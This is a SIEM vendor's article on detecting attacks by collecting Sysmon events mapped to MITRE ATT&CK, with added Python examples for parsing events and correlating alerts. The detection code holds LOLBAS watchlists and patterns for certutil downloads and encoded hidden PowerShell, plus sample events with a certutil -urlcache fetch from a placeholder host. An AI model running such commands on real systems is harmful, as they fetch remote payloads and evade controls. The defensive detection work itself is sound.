Identify attacks with Sysmon, MITRE ATT&CK and company SIEM

To identify a targeted attack within your Microsoft computer systems, you need visibility of possible indicators of compromise (IoC), collecting qualified information from endpoints, where most targeted attacks are concentrated. Endpoints are targeted for various reasons: they are the user’s access point to business information; they can be used to obtain privileged credentials (credential dumping techniques); and they are often used by non-expert users with access to personal data (increasingly sophisticated phishing techniques are combined with software vulnerabilities). Furthermore, by exploiting web browser vulnerabilities or the lack of advanced prevention tools, some techniques can circumvent perimeter controls (e.g. spear phishing via service).

Endpoint protection tools (which belong to the sphere of preventive controls) can be ineffective at identifying modern attacks. For this reason, most vendors have introduced more sophisticated tools that use behavioural analysis and machine learning to process endpoint telemetry and generate alarms automatically. Endpoint Detection and Response (EDR) solutions were created for this purpose but, while offering many advantages, represent an additional cost for the company. Most EDRs also require IT personnel to work through yet another console to review the anomalies the tool reports. Why not use the SIEM platform already in place to centralize compromise and attack indicators and highlight risk scenarios? Why not use a free tool to collect telemetry from Microsoft Windows endpoints?

As a supplier of a SIEM solution, at SGBox we decided to respond to these needs by integrating the information generated by a tool that Microsoft makes available for free: System Monitor (Sysmon). Sysmon (freely downloadable at https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon) is a software component (device driver) that, installed as a Windows service, allows you to monitor and track system activities by saving them in the Event Log. The data collected by Sysmon significantly increases Windows audit capabilities, allowing you to gather detailed information about processes, but also about network traffic (such as DNS queries created by programs run on endpoints, and the ports used) and file changes (allowing the discovery of timestomping techniques used by groups such as APT28 and by malware more generally).

Process information is enriched with further details such as a hash (SHA1), the Globally Unique Identifier (GUID) of the process, the session GUID and related processes. The collection of this data in the fully configurable SGBox SIEM allows both the visualization of anomalies in dedicated dashboards and the creation of automatic rules to generate different types of alarms (from email to Telegram message, up to possible interaction via API with a third-party solution).

Sysmon is configured with an XML file that determines which items to monitor. A number of freely usable configuration templates are available on GitHub (the most popular is probably the one from SwiftOnSecurity: https://github.com/SwiftOnSecurity/sysmon-config). SGBox, however, decided to suggest Olaf Hartong’s sysmon-modular (available here: https://github.com/olafhartong/sysmon-modular), because it effectively maps possible attack techniques to the Tactics, Techniques and Procedures (TTP) of the MITRE ATT&CK framework (https://attack.mitre.org/). The following screenshot shows the information obtained from running the “net user” command in Windows:

In the example shown, Sysmon allowed the command to be associated with the T1018 technique (Remote System Discovery, https://attack.mitre.org/techniques/T1018/), including information about the parent process, where the command was run, the file version, and much more.
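To make concrete what the SIEM has to do with such a record, here is an added example (not SGBox's or Sysmon's own code) that parses a Sysmon Event ID 1 (ProcessCreate) record exported as XML and extracts the process details listed above together with the ATT&CK technique that sysmon-modular writes into the RuleName field (`technique_id=...,technique_name=...`). The event below is constructed for the example: computer name, user, GUIDs, hash and file version are illustrative placeholders, and the field names are the standard Sysmon ProcessCreate field names.

```python
# Added example (not SGBox's or Sysmon's own code): parse one Sysmon
# Event ID 1 (ProcessCreate) record exported from the Windows Event Log
# as XML and pull out the ATT&CK technique tag set by sysmon-modular.
import json
import xml.etree.ElementTree as ET

EVENT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample record for `net user` tagged with T1018.
# Host name, user, GUIDs, hash and file version are placeholders.
SAMPLE_EVENT = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"/>
    <EventID>1</EventID>
    <TimeCreated SystemTime="2020-05-04T09:12:33.123456700Z"/>
    <Computer>WS-EXAMPLE.corp.example</Computer>
  </System>
  <EventData>
    <Data Name="RuleName">technique_id=T1018,technique_name=Remote System Discovery</Data>
    <Data Name="UtcTime">2020-05-04 09:12:33.123</Data>
    <Data Name="ProcessGuid">{11111111-2222-3333-4444-555555555555}</Data>
    <Data Name="ProcessId">4120</Data>
    <Data Name="Image">C:\Windows\System32\net.exe</Data>
    <Data Name="FileVersion">10.0.18362.1 (WinBuild.160101.0800)</Data>
    <Data Name="CommandLine">net user</Data>
    <Data Name="CurrentDirectory">C:\Users\alice\</Data>
    <Data Name="User">CORP\alice</Data>
    <Data Name="LogonGuid">{11111111-2222-3333-4444-666666666666}</Data>
    <Data Name="Hashes">SHA1=0000000000000000000000000000000000000000</Data>
    <Data Name="ParentProcessGuid">{11111111-2222-3333-4444-777777777777}</Data>
    <Data Name="ParentImage">C:\Windows\System32\cmd.exe</Data>
    <Data Name="ParentCommandLine">"C:\Windows\System32\cmd.exe"</Data>
  </EventData>
</Event>"""


def parse_rule_name(rule_name):
    """Split sysmon-modular's 'key=value,key=value' RuleName into a dict."""
    tags = {}
    for part in rule_name.split(","):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip()] = value.strip()
    return tags


def parse_process_create(xml_text):
    """Normalize a Sysmon ProcessCreate (Event ID 1) XML record into a flat dict."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=EVENT_NS))
    if event_id != 1:
        raise ValueError(f"expected Sysmon Event ID 1 (ProcessCreate), got {event_id}")
    # EventData is a list of <Data Name="..."> elements; index them by name.
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", EVENT_NS)}
    # Hashes is written as "SHA1=...,MD5=...,..." depending on the configured algorithms.
    hashes = dict(h.split("=", 1) for h in data.get("Hashes", "").split(",") if "=" in h)
    tags = parse_rule_name(data.get("RuleName", ""))
    tid = tags.get("technique_id")
    return {
        "computer": root.findtext("e:System/e:Computer", namespaces=EVENT_NS),
        "utc_time": data.get("UtcTime"),
        "image": data.get("Image"),
        "command_line": data.get("CommandLine"),
        "current_directory": data.get("CurrentDirectory"),
        "user": data.get("User"),
        "file_version": data.get("FileVersion"),
        "process_guid": data.get("ProcessGuid"),
        "logon_guid": data.get("LogonGuid"),
        "parent_image": data.get("ParentImage"),
        "parent_command_line": data.get("ParentCommandLine"),
        "sha1": hashes.get("SHA1"),
        "technique_id": tid,
        "technique_name": tags.get("technique_name"),
        # Link the analyst straight to the ATT&CK page for the technique.
        "technique_url": f"https://attack.mitre.org/techniques/{tid}/" if tid else None,
    }


if __name__ == "__main__":
    print(json.dumps(parse_process_create(SAMPLE_EVENT), indent=2))
```

The parser keeps the parent process and logon GUID because the dashboards described later pivot on exactly those fields; the ATT&CK URL is derived from the tag so a dashboard can link each process to its technique page.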

ATT&CK catalogues the modus operandi of attackers (pre- and post-compromise phases) starting from real cases, defines a common terminology and is widely adopted in security products (including EDR). After installing Sysmon on endpoints equipped with the SGBox agent, data is collected in the log management platform in a dedicated class (“Windows Sysmon”) and interpreted through patterns that recognise the event categories produced by the Microsoft device driver. Examples are: DNS query, driver loaded, file created, process creation, registry event create/delete, WMI event.

In addition to event recognition, SGBox can identify commands typically used by fileless techniques. These are programs (known in jargon as Living Off The Land Binaries and Scripts, or LOLBAS) that are normally present in the operating system, lend themselves to abuse and can be used for malicious actions. A typical example is the Windows certutil.exe command, as reported by MITRE at the following address: https://attack.mitre.org/software/S0160/. certutil.exe can be used legitimately to view certification authority (CA) configuration information or verify certificates in the operating system, but it can also be abused to bypass preventive tool checks, access external resources, and install root certificates in browsers for use in man-in-the-middle attacks.

Blacklists can be updated with the programs actually used in your own environment, in order to improve process monitoring and reduce false positives. Statistics are presented in two dashboards: the first with details of the processes detected and their mapping to MITRE ATT&CK techniques; the second with information about network connections (DNS traffic and the related processes). An example is given in the following image:

Indicating the MITRE ATT&CK techniques related to the processes detected (not necessarily malicious) allows deeper analysis. Correlation rules allow you to reduce false positives. An example is given in the following image (detail of the job dashboard containing statistics on the TTPs detected in a given time interval):

When suspicious actions are detected (LOLBAS commands, execution of a PowerShell script, etc.), automatic correlation rules can naturally be associated with them to generate alarms of various types.
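The LOLBAS blacklist, the environment-specific tuning that reduces false positives, and the correlation over TTPs seen in a time window (the three preceding passages) can be put together in one small rule engine. The following is an added example, not SGBox's own correlation logic: it works on ProcessCreate events already normalized into dicts (the field names match the Sysmon ProcessCreate fields), keeps a watchlist of LOLBAS binaries and their suspicious arguments, suppresses known-good parent/child pairs that an administrator registers for their own environment, and escalates when one host/user shows several distinct ATT&CK techniques within ten minutes. The events, host names, the `patchagent.exe` parent and the encoded-command blob are all constructed for the example; the ATT&CK IDs used are real (T1018 from the article, T1033 System Owner/User Discovery, T1059.001 PowerShell).

```python
# Added example (not SGBox's own code): LOLBAS watchlist, per-environment
# allowlist and time-window correlation over normalized Sysmon
# ProcessCreate events. All sample events below are constructed.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# LOLBAS binaries to flag whenever they run (extend with your own findings).
LOLBAS_WATCHLIST = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "bitsadmin.exe"}

# Argument patterns that raise the severity of an otherwise common binary.
SUSPICIOUS_ARGS = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-addstore", re.I),
    "powershell.exe": re.compile(r"\s-e(nc|ncodedcommand)?\b|\s-nop\b|bypass|downloadstring", re.I),
}

# (child basename, parent basename) pairs that are legitimate in THIS environment.
# Constructed example: a patch-management agent that calls certutil during updates.
ALLOWLIST = {("certutil.exe", "patchagent.exe")}

WINDOW = timedelta(minutes=10)   # correlation window per host/user
CHAIN_THRESHOLD = 3              # distinct techniques in WINDOW -> escalate


def basename(path):
    """Lower-case file name of a Windows path (works for '' or None too)."""
    return (path or "").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return (severity, reason) for one event, or None when nothing should fire."""
    image, parent = basename(event.get("image")), basename(event.get("parent_image"))
    if (image, parent) in ALLOWLIST:
        return None                                   # known-good in this environment
    cmd = event.get("command_line") or ""
    pattern = SUSPICIOUS_ARGS.get(image)
    if pattern and pattern.search(cmd):
        return ("high", f"{image} executed with suspicious arguments")
    if image in LOLBAS_WATCHLIST:
        return ("medium", f"LOLBAS binary {image} executed")
    if image == "powershell.exe" and ".ps1" in cmd.lower():
        return ("medium", "PowerShell script execution")
    if event.get("technique_id"):
        return ("low", f"tagged {event['technique_id']} ({event.get('technique_name')})")
    return None


def correlate(events):
    """Per-event alerts plus one escalation per host/user that shows
    CHAIN_THRESHOLD distinct ATT&CK techniques inside WINDOW."""
    alerts, escalated = [], set()
    history = defaultdict(list)   # (computer, user) -> [(time, technique_id)]
    for ev in sorted(events, key=lambda e: e["time"]):
        verdict = evaluate(ev)
        if verdict is None:
            continue
        severity, reason = verdict
        base = {"time": ev["time"], "computer": ev["computer"], "user": ev["user"]}
        alerts.append({**base, "severity": severity, "reason": reason,
                       "technique_id": ev.get("technique_id")})
        if not ev.get("technique_id"):
            continue
        key = (ev["computer"], ev["user"])
        history[key].append((ev["time"], ev["technique_id"]))
        recent = sorted({tid for t, tid in history[key] if ev["time"] - t <= WINDOW})
        if len(recent) >= CHAIN_THRESHOLD and key not in escalated:
            escalated.add(key)
            alerts.append({**base, "severity": "critical", "technique_ids": recent,
                           "reason": f"{len(recent)} distinct ATT&CK techniques within {WINDOW}"})
    return alerts


T0 = datetime(2020, 5, 4, 9, 0, 0)


def make_event(minute, image, command_line, parent_image, technique_id=None,
               technique_name=None, computer="WS-EXAMPLE", user=r"CORP\alice"):
    """Build a constructed, already-normalized ProcessCreate event."""
    return {"time": T0 + timedelta(minutes=minute), "computer": computer, "user": user,
            "image": image, "command_line": command_line, "parent_image": parent_image,
            "technique_id": technique_id, "technique_name": technique_name}


SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    make_event(0, SYS32 + r"\net.exe", "net user", SYS32 + r"\cmd.exe", "T1018", "Remote System Discovery"),
    # Legitimate certutil use by the (constructed) patch agent: allowlisted, no alert.
    make_event(1, SYS32 + r"\certutil.exe", "certutil -verify update.cer", r"C:\Program Files\PatchAgent\patchagent.exe"),
    # Same binary from a shell, fetching an external resource: high.
    make_event(2, SYS32 + r"\certutil.exe", "certutil -urlcache -split -f http://files.example.invalid/update.txt update.txt", SYS32 + r"\cmd.exe"),
    make_event(3, SYS32 + r"\whoami.exe", "whoami /all", SYS32 + r"\cmd.exe", "T1033", "System Owner/User Discovery"),
    # Constructed encoded command ("QQBCAEMA" is just "ABC" in UTF-16LE base64).
    make_event(4, SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe", "powershell -nop -w hidden -enc QQBCAEMA", SYS32 + r"\cmd.exe", "T1059.001", "PowerShell"),
    make_event(30, SYS32 + r"\notepad.exe", "notepad readme.txt", r"C:\Windows\explorer.exe"),  # benign
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert["time"].isoformat(), alert["severity"].upper(), alert["reason"])
```

Run as is, the engine yields two low alerts for the tagged discovery commands, two high alerts (certutil from a shell with `-urlcache`, PowerShell with an encoded command) and a single critical escalation when the third distinct technique appears for the same host and user within the window; the allowlisted certutil call and the editor launch produce nothing. The allowlist is where the article's "programs used in your own environment" go, and the window threshold is the kind of correlation rule that turns individually weak signals into an alarm worth an email or Telegram message.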

By integrating Sysmon information with detailed MITRE ATT&CK techniques, SGBox offers customers a convenient way to identify possible risk scenarios on Windows platforms, reducing both false positives and the complexity of the IT infrastructure.


Giorgio di Grazia

Technical Account Manager at SGBox